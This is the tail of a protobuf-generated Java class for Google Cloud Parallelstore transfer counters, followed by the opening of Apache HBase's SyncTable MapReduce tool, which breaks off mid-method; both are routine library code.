bytes_found = 2;</code> * * @return The bytesFound. */ @java.lang.Override public long getBytesFound() { return bytesFound_; } public static final int OBJECTS_SKIPPED_FIELD_NUMBER = 3; private long objectsSkipped_ = 0L; /** * * * <pre> * Objects in the data source that are not transferred because they already * exist in the data destination. 
* </pre> * * <code>int64 objects_skipped = 3;</code> * * @return The objectsSkipped. */ @java.lang.Override public long getObjectsSkipped() { return objectsSkipped_; } public static final int BYTES_SKIPPED_FIELD_NUMBER = 4; private long bytesSkipped_ = 0L; /** * * * <pre> * Bytes in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 bytes_skipped = 4;</code> * * @return The bytesSkipped. */ @java.lang.Override public long getBytesSkipped() { return bytesSkipped_; } public static final int OBJECTS_COPIED_FIELD_NUMBER = 5; private long objectsCopied_ = 0L; /** * * * <pre> * Objects that are copied to the data destination. * </pre> * * <code>int64 objects_copied = 5;</code> * * @return The objectsCopied. */ @java.lang.Override public long getObjectsCopied() { return objectsCopied_; } public static final int BYTES_COPIED_FIELD_NUMBER = 6; private long bytesCopied_ = 0L; /** * * * <pre> * Bytes that are copied to the data destination. * </pre> * * <code>int64 bytes_copied = 6;</code> * * @return The bytesCopied. */ @java.lang.Override public long getBytesCopied() { return bytesCopied_; } public static final int OBJECTS_FAILED_FIELD_NUMBER = 7; private long objectsFailed_ = 0L; /** * * * <pre> * Objects that are failed to write to the data destination. * </pre> * * <code>int64 objects_failed = 7;</code> * * @return The objectsFailed. */ @java.lang.Override public long getObjectsFailed() { return objectsFailed_; } public static final int BYTES_FAILED_FIELD_NUMBER = 8; private long bytesFailed_ = 0L; /** * * * <pre> * Bytes that are failed to write to the data destination. * </pre> * * <code>int64 bytes_failed = 8;</code> * * @return The bytesFailed. 
*/ @java.lang.Override public long getBytesFailed() { return bytesFailed_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (objectsFound_ != 0L) { output.writeInt64(1, objectsFound_); } if (bytesFound_ != 0L) { output.writeInt64(2, bytesFound_); } if (objectsSkipped_ != 0L) { output.writeInt64(3, objectsSkipped_); } if (bytesSkipped_ != 0L) { output.writeInt64(4, bytesSkipped_); } if (objectsCopied_ != 0L) { output.writeInt64(5, objectsCopied_); } if (bytesCopied_ != 0L) { output.writeInt64(6, bytesCopied_); } if (objectsFailed_ != 0L) { output.writeInt64(7, objectsFailed_); } if (bytesFailed_ != 0L) { output.writeInt64(8, bytesFailed_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (objectsFound_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(1, objectsFound_); } if (bytesFound_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(2, bytesFound_); } if (objectsSkipped_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(3, objectsSkipped_); } if (bytesSkipped_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(4, bytesSkipped_); } if (objectsCopied_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(5, objectsCopied_); } if (bytesCopied_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(6, bytesCopied_); } if (objectsFailed_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(7, objectsFailed_); } if (bytesFailed_ != 0L) { size += 
com.google.protobuf.CodedOutputStream.computeInt64Size(8, bytesFailed_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.parallelstore.v1.TransferCounters)) { return super.equals(obj); } com.google.cloud.parallelstore.v1.TransferCounters other = (com.google.cloud.parallelstore.v1.TransferCounters) obj; if (getObjectsFound() != other.getObjectsFound()) return false; if (getBytesFound() != other.getBytesFound()) return false; if (getObjectsSkipped() != other.getObjectsSkipped()) return false; if (getBytesSkipped() != other.getBytesSkipped()) return false; if (getObjectsCopied() != other.getObjectsCopied()) return false; if (getBytesCopied() != other.getBytesCopied()) return false; if (getObjectsFailed() != other.getObjectsFailed()) return false; if (getBytesFailed() != other.getBytesFailed()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + OBJECTS_FOUND_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getObjectsFound()); hash = (37 * hash) + BYTES_FOUND_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getBytesFound()); hash = (37 * hash) + OBJECTS_SKIPPED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getObjectsSkipped()); hash = (37 * hash) + BYTES_SKIPPED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getBytesSkipped()); hash = (37 * hash) + OBJECTS_COPIED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getObjectsCopied()); hash = (37 * hash) + BYTES_COPIED_FIELD_NUMBER; hash = (53 * hash) + 
com.google.protobuf.Internal.hashLong(getBytesCopied()); hash = (37 * hash) + OBJECTS_FAILED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getObjectsFailed()); hash = (37 * hash) + BYTES_FAILED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getBytesFailed()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( java.io.InputStream input) throws java.io.IOException { return 
com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.parallelstore.v1.TransferCounters parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.parallelstore.v1.TransferCounters parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.parallelstore.v1.TransferCounters prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? 
new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * A collection of counters that report the progress of a transfer operation. * </pre> * * Protobuf type {@code google.cloud.parallelstore.v1.TransferCounters} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.parallelstore.v1.TransferCounters) com.google.cloud.parallelstore.v1.TransferCountersOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.parallelstore.v1.ParallelstoreProto .internal_static_google_cloud_parallelstore_v1_TransferCounters_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.parallelstore.v1.ParallelstoreProto .internal_static_google_cloud_parallelstore_v1_TransferCounters_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.parallelstore.v1.TransferCounters.class, com.google.cloud.parallelstore.v1.TransferCounters.Builder.class); } // Construct using com.google.cloud.parallelstore.v1.TransferCounters.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; objectsFound_ = 0L; bytesFound_ = 0L; objectsSkipped_ = 0L; bytesSkipped_ = 0L; objectsCopied_ = 0L; bytesCopied_ = 0L; objectsFailed_ = 0L; bytesFailed_ = 0L; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.parallelstore.v1.ParallelstoreProto .internal_static_google_cloud_parallelstore_v1_TransferCounters_descriptor; } 
@java.lang.Override public com.google.cloud.parallelstore.v1.TransferCounters getDefaultInstanceForType() { return com.google.cloud.parallelstore.v1.TransferCounters.getDefaultInstance(); } @java.lang.Override public com.google.cloud.parallelstore.v1.TransferCounters build() { com.google.cloud.parallelstore.v1.TransferCounters result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.parallelstore.v1.TransferCounters buildPartial() { com.google.cloud.parallelstore.v1.TransferCounters result = new com.google.cloud.parallelstore.v1.TransferCounters(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.parallelstore.v1.TransferCounters result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.objectsFound_ = objectsFound_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.bytesFound_ = bytesFound_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.objectsSkipped_ = objectsSkipped_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.bytesSkipped_ = bytesSkipped_; } if (((from_bitField0_ & 0x00000010) != 0)) { result.objectsCopied_ = objectsCopied_; } if (((from_bitField0_ & 0x00000020) != 0)) { result.bytesCopied_ = bytesCopied_; } if (((from_bitField0_ & 0x00000040) != 0)) { result.objectsFailed_ = objectsFailed_; } if (((from_bitField0_ & 0x00000080) != 0)) { result.bytesFailed_ = bytesFailed_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder 
clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.parallelstore.v1.TransferCounters) { return mergeFrom((com.google.cloud.parallelstore.v1.TransferCounters) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.parallelstore.v1.TransferCounters other) { if (other == com.google.cloud.parallelstore.v1.TransferCounters.getDefaultInstance()) return this; if (other.getObjectsFound() != 0L) { setObjectsFound(other.getObjectsFound()); } if (other.getBytesFound() != 0L) { setBytesFound(other.getBytesFound()); } if (other.getObjectsSkipped() != 0L) { setObjectsSkipped(other.getObjectsSkipped()); } if (other.getBytesSkipped() != 0L) { setBytesSkipped(other.getBytesSkipped()); } if (other.getObjectsCopied() != 0L) { setObjectsCopied(other.getObjectsCopied()); } if (other.getBytesCopied() != 0L) { setBytesCopied(other.getBytesCopied()); } if (other.getObjectsFailed() != 0L) { setObjectsFailed(other.getObjectsFailed()); } if (other.getBytesFailed() != 0L) { setBytesFailed(other.getBytesFailed()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new 
java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 8: { objectsFound_ = input.readInt64(); bitField0_ |= 0x00000001; break; } // case 8 case 16: { bytesFound_ = input.readInt64(); bitField0_ |= 0x00000002; break; } // case 16 case 24: { objectsSkipped_ = input.readInt64(); bitField0_ |= 0x00000004; break; } // case 24 case 32: { bytesSkipped_ = input.readInt64(); bitField0_ |= 0x00000008; break; } // case 32 case 40: { objectsCopied_ = input.readInt64(); bitField0_ |= 0x00000010; break; } // case 40 case 48: { bytesCopied_ = input.readInt64(); bitField0_ |= 0x00000020; break; } // case 48 case 56: { objectsFailed_ = input.readInt64(); bitField0_ |= 0x00000040; break; } // case 56 case 64: { bytesFailed_ = input.readInt64(); bitField0_ |= 0x00000080; break; } // case 64 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private long objectsFound_; /** * * * <pre> * Objects found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 objects_found = 1;</code> * * @return The objectsFound. */ @java.lang.Override public long getObjectsFound() { return objectsFound_; } /** * * * <pre> * Objects found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 objects_found = 1;</code> * * @param value The objectsFound to set. * @return This builder for chaining. 
*/ public Builder setObjectsFound(long value) { objectsFound_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Objects found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 objects_found = 1;</code> * * @return This builder for chaining. */ public Builder clearObjectsFound() { bitField0_ = (bitField0_ & ~0x00000001); objectsFound_ = 0L; onChanged(); return this; } private long bytesFound_; /** * * * <pre> * Bytes found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 bytes_found = 2;</code> * * @return The bytesFound. */ @java.lang.Override public long getBytesFound() { return bytesFound_; } /** * * * <pre> * Bytes found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 bytes_found = 2;</code> * * @param value The bytesFound to set. * @return This builder for chaining. */ public Builder setBytesFound(long value) { bytesFound_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Bytes found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 bytes_found = 2;</code> * * @return This builder for chaining. */ public Builder clearBytesFound() { bitField0_ = (bitField0_ & ~0x00000002); bytesFound_ = 0L; onChanged(); return this; } private long objectsSkipped_; /** * * * <pre> * Objects in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 objects_skipped = 3;</code> * * @return The objectsSkipped. 
*/ @java.lang.Override public long getObjectsSkipped() { return objectsSkipped_; } /** * * * <pre> * Objects in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 objects_skipped = 3;</code> * * @param value The objectsSkipped to set. * @return This builder for chaining. */ public Builder setObjectsSkipped(long value) { objectsSkipped_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Objects in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 objects_skipped = 3;</code> * * @return This builder for chaining. */ public Builder clearObjectsSkipped() { bitField0_ = (bitField0_ & ~0x00000004); objectsSkipped_ = 0L; onChanged(); return this; } private long bytesSkipped_; /** * * * <pre> * Bytes in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 bytes_skipped = 4;</code> * * @return The bytesSkipped. */ @java.lang.Override public long getBytesSkipped() { return bytesSkipped_; } /** * * * <pre> * Bytes in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 bytes_skipped = 4;</code> * * @param value The bytesSkipped to set. * @return This builder for chaining. */ public Builder setBytesSkipped(long value) { bytesSkipped_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * Bytes in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 bytes_skipped = 4;</code> * * @return This builder for chaining. */ public Builder clearBytesSkipped() { bitField0_ = (bitField0_ & ~0x00000008); bytesSkipped_ = 0L; onChanged(); return this; } private long objectsCopied_; /** * * * <pre> * Objects that are copied to the data destination. 
* </pre> * * <code>int64 objects_copied = 5;</code> * * @return The objectsCopied. */ @java.lang.Override public long getObjectsCopied() { return objectsCopied_; } /** * * * <pre> * Objects that are copied to the data destination. * </pre> * * <code>int64 objects_copied = 5;</code> * * @param value The objectsCopied to set. * @return This builder for chaining. */ public Builder setObjectsCopied(long value) { objectsCopied_ = value; bitField0_ |= 0x00000010; onChanged(); return this; } /** * * * <pre> * Objects that are copied to the data destination. * </pre> * * <code>int64 objects_copied = 5;</code> * * @return This builder for chaining. */ public Builder clearObjectsCopied() { bitField0_ = (bitField0_ & ~0x00000010); objectsCopied_ = 0L; onChanged(); return this; } private long bytesCopied_; /** * * * <pre> * Bytes that are copied to the data destination. * </pre> * * <code>int64 bytes_copied = 6;</code> * * @return The bytesCopied. */ @java.lang.Override public long getBytesCopied() { return bytesCopied_; } /** * * * <pre> * Bytes that are copied to the data destination. * </pre> * * <code>int64 bytes_copied = 6;</code> * * @param value The bytesCopied to set. * @return This builder for chaining. */ public Builder setBytesCopied(long value) { bytesCopied_ = value; bitField0_ |= 0x00000020; onChanged(); return this; } /** * * * <pre> * Bytes that are copied to the data destination. * </pre> * * <code>int64 bytes_copied = 6;</code> * * @return This builder for chaining. */ public Builder clearBytesCopied() { bitField0_ = (bitField0_ & ~0x00000020); bytesCopied_ = 0L; onChanged(); return this; } private long objectsFailed_; /** * * * <pre> * Objects that are failed to write to the data destination. * </pre> * * <code>int64 objects_failed = 7;</code> * * @return The objectsFailed. */ @java.lang.Override public long getObjectsFailed() { return objectsFailed_; } /** * * * <pre> * Objects that are failed to write to the data destination. 
* </pre> * * <code>int64 objects_failed = 7;</code> * * @param value The objectsFailed to set. * @return This builder for chaining. */ public Builder setObjectsFailed(long value) { objectsFailed_ = value; bitField0_ |= 0x00000040; onChanged(); return this; } /** * * * <pre> * Objects that are failed to write to the data destination. * </pre> * * <code>int64 objects_failed = 7;</code> * * @return This builder for chaining. */ public Builder clearObjectsFailed() { bitField0_ = (bitField0_ & ~0x00000040); objectsFailed_ = 0L; onChanged(); return this; } private long bytesFailed_; /** * * * <pre> * Bytes that are failed to write to the data destination. * </pre> * * <code>int64 bytes_failed = 8;</code> * * @return The bytesFailed. */ @java.lang.Override public long getBytesFailed() { return bytesFailed_; } /** * * * <pre> * Bytes that are failed to write to the data destination. * </pre> * * <code>int64 bytes_failed = 8;</code> * * @param value The bytesFailed to set. * @return This builder for chaining. */ public Builder setBytesFailed(long value) { bytesFailed_ = value; bitField0_ |= 0x00000080; onChanged(); return this; } /** * * * <pre> * Bytes that are failed to write to the data destination. * </pre> * * <code>int64 bytes_failed = 8;</code> * * @return This builder for chaining. 
*/ public Builder clearBytesFailed() { bitField0_ = (bitField0_ & ~0x00000080); bytesFailed_ = 0L; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.parallelstore.v1.TransferCounters) } // @@protoc_insertion_point(class_scope:google.cloud.parallelstore.v1.TransferCounters) private static final com.google.cloud.parallelstore.v1.TransferCounters DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.parallelstore.v1.TransferCounters(); } public static com.google.cloud.parallelstore.v1.TransferCounters getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<TransferCounters> PARSER = new com.google.protobuf.AbstractParser<TransferCounters>() { @java.lang.Override public TransferCounters parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<TransferCounters> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<TransferCounters> 
getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.parallelstore.v1.TransferCounters getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/hbase
35,847
hbase-mapreduce/src/main/java/org/apache/hadoop/hbase/mapreduce/SyncTable.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hbase.mapreduce; import java.io.IOException; import java.net.URI; import java.net.URISyntaxException; import java.util.Collections; import java.util.Iterator; import org.apache.commons.lang3.StringUtils; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.conf.Configured; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoop.fs.FileSystem; import org.apache.hadoop.fs.Path; import org.apache.hadoop.hbase.Cell; import org.apache.hadoop.hbase.CellBuilderFactory; import org.apache.hadoop.hbase.CellBuilderType; import org.apache.hadoop.hbase.CellComparator; import org.apache.hadoop.hbase.CellUtil; import org.apache.hadoop.hbase.HBaseConfiguration; import org.apache.hadoop.hbase.TableName; import org.apache.hadoop.hbase.client.Connection; import org.apache.hadoop.hbase.client.ConnectionFactory; import org.apache.hadoop.hbase.client.Delete; import org.apache.hadoop.hbase.client.Mutation; import org.apache.hadoop.hbase.client.Put; import org.apache.hadoop.hbase.client.Result; import org.apache.hadoop.hbase.client.ResultScanner; import org.apache.hadoop.hbase.client.Scan; import org.apache.hadoop.hbase.client.Table; import 
org.apache.hadoop.hbase.io.ImmutableBytesWritable; import org.apache.hadoop.hbase.util.Bytes; import org.apache.hadoop.hbase.util.EnvironmentEdgeManager; import org.apache.hadoop.mapreduce.Counters; import org.apache.hadoop.mapreduce.Job; import org.apache.hadoop.mapreduce.lib.output.NullOutputFormat; import org.apache.hadoop.mapreduce.security.TokenCache; import org.apache.hadoop.util.GenericOptionsParser; import org.apache.hadoop.util.Tool; import org.apache.hadoop.util.ToolRunner; import org.apache.yetus.audience.InterfaceAudience; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.apache.hbase.thirdparty.com.google.common.base.Throwables; @InterfaceAudience.Private public class SyncTable extends Configured implements Tool { private static final Logger LOG = LoggerFactory.getLogger(SyncTable.class); static final String SOURCE_HASH_DIR_CONF_KEY = "sync.table.source.hash.dir"; static final String SOURCE_TABLE_CONF_KEY = "sync.table.source.table.name"; static final String TARGET_TABLE_CONF_KEY = "sync.table.target.table.name"; static final String SOURCE_URI_CONF_KEY = "sync.table.source.uri"; /** * @deprecated Since 3.0.0, will be removed in 4.0.0 Use {@link #SOURCE_URI_CONF_KEY} instead. */ @Deprecated static final String SOURCE_ZK_CLUSTER_CONF_KEY = "sync.table.source.zk.cluster"; static final String TARGET_URI_CONF_KEY = "sync.table.target.uri"; /** * @deprecated Since 3.0.0, will be removed in 4.0.0 Use {@link #TARGET_URI_CONF_KEY} instead. 
*/ @Deprecated static final String TARGET_ZK_CLUSTER_CONF_KEY = "sync.table.target.zk.cluster"; static final String DRY_RUN_CONF_KEY = "sync.table.dry.run"; static final String DO_DELETES_CONF_KEY = "sync.table.do.deletes"; static final String DO_PUTS_CONF_KEY = "sync.table.do.puts"; static final String IGNORE_TIMESTAMPS = "sync.table.ignore.timestamps"; Path sourceHashDir; String sourceTableName; String targetTableName; URI sourceUri; /** * @deprecated Since 3.0.0, will be removed in 4.0.0 Use {@link #sourceUri} instead. */ @Deprecated String sourceZkCluster; URI targetUri; /** * @deprecated Since 3.0.0, will be removed in 4.0.0 Use {@link #targetUri} instead. */ @Deprecated String targetZkCluster; boolean dryRun; boolean doDeletes = true; boolean doPuts = true; boolean ignoreTimestamps; Counters counters; public SyncTable(Configuration conf) { super(conf); } private void initCredentialsForHBase(String clusterKey, Job job) throws IOException { Configuration peerConf = HBaseConfiguration.createClusterConf(job.getConfiguration(), clusterKey); TableMapReduceUtil.initCredentialsForCluster(job, peerConf); } public Job createSubmittableJob(String[] args) throws IOException { FileSystem fs = sourceHashDir.getFileSystem(getConf()); if (!fs.exists(sourceHashDir)) { throw new IOException("Source hash dir not found: " + sourceHashDir); } Job job = Job.getInstance(getConf(), getConf().get("mapreduce.job.name", "syncTable_" + sourceTableName + "-" + targetTableName)); Configuration jobConf = job.getConfiguration(); if ("kerberos".equalsIgnoreCase(jobConf.get("hadoop.security.authentication"))) { TokenCache.obtainTokensForNamenodes(job.getCredentials(), new Path[] { sourceHashDir }, getConf()); } HashTable.TableHash tableHash = HashTable.TableHash.read(getConf(), sourceHashDir); LOG.info("Read source hash manifest: " + tableHash); LOG.info("Read " + tableHash.partitions.size() + " partition keys"); if (!tableHash.tableName.equals(sourceTableName)) { LOG.warn("Table name 
mismatch - manifest indicates hash was taken from: " + tableHash.tableName + " but job is reading from: " + sourceTableName); } if (tableHash.numHashFiles != tableHash.partitions.size() + 1) { throw new RuntimeException("Hash data appears corrupt. The number of of hash files created" + " should be 1 more than the number of partition keys. However, the manifest file " + " says numHashFiles=" + tableHash.numHashFiles + " but the number of partition keys" + " found in the partitions file is " + tableHash.partitions.size()); } Path dataDir = new Path(sourceHashDir, HashTable.HASH_DATA_DIR); int dataSubdirCount = 0; for (FileStatus file : fs.listStatus(dataDir)) { if (file.getPath().getName().startsWith(HashTable.OUTPUT_DATA_FILE_PREFIX)) { dataSubdirCount++; } } if (dataSubdirCount != tableHash.numHashFiles) { throw new RuntimeException("Hash data appears corrupt. The number of of hash files created" + " should be 1 more than the number of partition keys. However, the number of data dirs" + " found is " + dataSubdirCount + " but the number of partition keys" + " found in the partitions file is " + tableHash.partitions.size()); } job.setJarByClass(HashTable.class); jobConf.set(SOURCE_HASH_DIR_CONF_KEY, sourceHashDir.toString()); jobConf.set(SOURCE_TABLE_CONF_KEY, sourceTableName); jobConf.set(TARGET_TABLE_CONF_KEY, targetTableName); if (sourceUri != null) { jobConf.set(SOURCE_URI_CONF_KEY, sourceUri.toString()); TableMapReduceUtil.initCredentialsForCluster(job, jobConf, sourceUri); } else if (sourceZkCluster != null) { jobConf.set(SOURCE_ZK_CLUSTER_CONF_KEY, sourceZkCluster); initCredentialsForHBase(sourceZkCluster, job); } if (targetUri != null) { jobConf.set(TARGET_URI_CONF_KEY, targetUri.toString()); TableMapReduceUtil.initCredentialsForCluster(job, jobConf, targetUri); } else if (targetZkCluster != null) { jobConf.set(TARGET_ZK_CLUSTER_CONF_KEY, targetZkCluster); initCredentialsForHBase(targetZkCluster, job); } jobConf.setBoolean(DRY_RUN_CONF_KEY, dryRun); 
